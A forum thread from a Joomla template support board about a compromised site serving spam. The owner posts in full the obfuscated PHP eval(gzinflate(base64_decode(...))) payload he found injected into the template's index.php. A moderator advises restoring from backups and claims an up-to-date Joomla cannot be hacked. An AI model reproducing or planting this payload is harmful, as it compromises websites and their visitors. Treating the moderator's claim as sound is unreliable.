Site compromised and now have spam on Joomla Panacea
-
-
- innov8ion
- Jr. Rocketeer
- Posts: 49
- Thanks: 0
-
Our Joomla site was recently compromised and now serves spam in addition to our content. Below is a screenshot of what it looks like.
I'm trying to determine where the code is that I need to chop out. I know there's many template files and I'm not sure where to look. I've since changed my telnet/ftp passwords. Any advice?
Thanks!
Dave
This image is hidden for guests.
Please log in or register to see it.
-
-
-
- innov8ion
- Jr. Rocketeer
- Posts: 49
- Thanks: 0
-
JEM wrote:
Not a template (or Joomla) issue. You need to revert to your latest backup.Reverting back is no longer possible. What are you suggesting it is? It appears on the site, so the bad code is somewhere. I'm just trying to locate and delete it.
Thanks,
Dave
-
-
-
- JEM
- Preeminent Rocketeer
- Posts: 17917
- Thanks: 4
-
As a template club, we can not be responsible for, or trouble shoot you issues if you get hacked.
(Though some members may have an answer...)
The templates are simply a 'skin' that fits over Joomla, so it is not a template issue.
If your Joomla version is up to date, as it should be, then there should be no way to hack the site.
You can look here for useful info:
www.rockettheme.com/forum/index.php?f=15&t=54455&rb_v=viewtopic
innov8ion wrote:JEM wrote:Not a template (or Joomla) issue. You need to revert to your latest backup.Reverting back is no longer possible. What are you suggesting it is? It appears on the site, so the bad code is somewhere. I'm just trying to get rid of it.
Every host that I am familiar with has a back-up policy of at least 3 days. So, you should be able to contact your host if you have nothing to restore to and ask them to reset the site.
Besides that, get in the habit of backing up your site and not relying on your host by using something like Akeeba. www.akeebabackup.com/
You could try to upload a clean set of files from your computer to the host, overwriting the damaged files, but there is no guarantee - Thanks,
jim
-
-
-
- innov8ion
- Jr. Rocketeer
- Posts: 49
- Thanks: 0
-
First, I am using the most recent version of Joomla -- 1.5.23. Second, I use Linode and have backups. It's just that the backups I have are too new.
I was mainly asking to determine which Panacea template file to look at for the bad code. In any case, I think I found and removed it myself. The following code was in index.php in the panacea template folder. It was below the footer and directly above the closing html tag. Assuming this isn't in your code, it must be this.
<?php eval(@gzinflate(base64_decode('3Vdbb9pIFP4rJ8iq7ZY1BJpdCZddkuB00aam65DNQxpZxh7CCN9kj7fJtv7vPTO2Idwpfak2UiTmzLlfvuOZthV5yljcaTRmQbvVbJ1pM/IcOO6UhkTzSGOc+WM6Mxunbc2nKZPrcAqv4bdWs1mHwyTHEbNprLEnJqv6JAtdRqMQpm1FyuogMfx3fRW+SGGEnNAFmqaEKZJtGX/fGjeje1lcyA8q/AEsyQh0YOL4KdElj4yzx00S4mKTBGshe/vXZhNjOMNje3E8beE5ACQoJz0aUvsRdcpZ7EeOZ7Mgtj2ayCpXKTfw2JBR63Y+nU5QDyqMUSFL6CylipMkzrOCNMyc1qCB80jShvOvw5wkbaBqTAKXKsLCA3GnkSL3jYvb9x1QDMsaWh1gJIijxEmeIXbYFEJM2STKQq8OCWFZEqrvxsnvslb7lHwKa6qeF1Q936F5YF4NVxV3ZQ0d1eRVdUKNqNeSQn6YUJ/Y5AmbJOVBxlrgnQledYvFojGAy0EhV1hdSK7ZlzhzwGhAMK3z3yvmdMnNkoSEDHg1BQPSPDqZgPjrwpzhF1ho1Jd9HA0+GB0oGblj5U8NR2Auw+nzA7/hVkglwQ+c6OJQELviZ621sIpccgff4US0tuTr9mZgvofL88s/DbgYjuzBR7gaXBsrFQKCnb5ZQX94Z14Pz/tgGnc7NOT57nLCq1egFGnFBG6rgjqPRRpHZbVWC1U5K7nIgPn1bRwoJi7LAXIPGgouqhTtpIqR4Gr2TYSwh8ARxdxiHS5vrevhxxGiyOjWMkfWuXlzZViId7x5Kv/IE3GRG0l+RcL5p+EkElRBcP0oJeIoPPfvBU7abuQR+QG6XUDw5DmUPIynJ/IcZwzvQ4aNs5LtOmfTixSSJ0QZjyg1DKSg5/vn+jnKEsAxo2kHath+9o1h/WNY9zXL+DAcGfZ5v2/VHjS5tmnSC4TlvgoQXjNxd26Z2JQdTPoFpj1A77DdMRAaZmQTdpyUMI8qT3AolN4WfzC8cXQYImKAGJwoexpTjyT7Cl+Exg7HsAyByJW3wZhPw9lWEBOi3wtipb2fHcf2wNgBKHY9MP/6EQzbJr8LwbKylntBrGRUq2AS4ngrIFay6Lua1Ox3oBIVvXJYex7SlUcu1uyIvZr9/Gu1vacf2wc15M3oxxpys/zOhjyoGatG5FGIdbTaijvWaXbENuUf+/+rXZpVq9Q7dpOm9D8+wSmzxZc8Nh2nRBOUWp+oUh2vFo+uJ0TsxAk9RXjBS9Rb1AifCAFe3Ev+g3pUtcLZodUCfbEAv6Nu+YbCbV6kW5ekF30O+TNp1a/ddRMYWxRJaBbVKjt9f3qEYXM42mo87600Wp7PH6n8C0WiMRoX5UMbAEVt+IfmlzKfxdsSIAf8aKHs9EV/yRynODNeTyJcA+5UKXSBkyJeTok7I96AK1scihcjtsPiWmRa2MGe70LKkjhKXzDgi/K1LGAEjfGxWFINZT+IxzAWEp1srTn5whh6immlyNLUUSHizlsd3ryR6DwBQsW9RMUIomn4+hWWaCIR/FA1B+XU9roz1ceiyF9R1DHmacbPucjpUpYXtSkf1fPKbEgvf8iW9mlqf04oc8YcNAV9UT9xxrIvG/oG'))); ?>
-
-
-
- JEM
- Preeminent Rocketeer
- Posts: 17917
- Thanks: 4
-
Well, as you said, delete the rouge codes, that is one solution...
As I said before, you could upload a new version of the template and overwrite any comprised files... but there is no guarantee that this will be the final solution.
But perhaps you are all set now? - Thanks,
jim
-
Time to create page: 0.077 seconds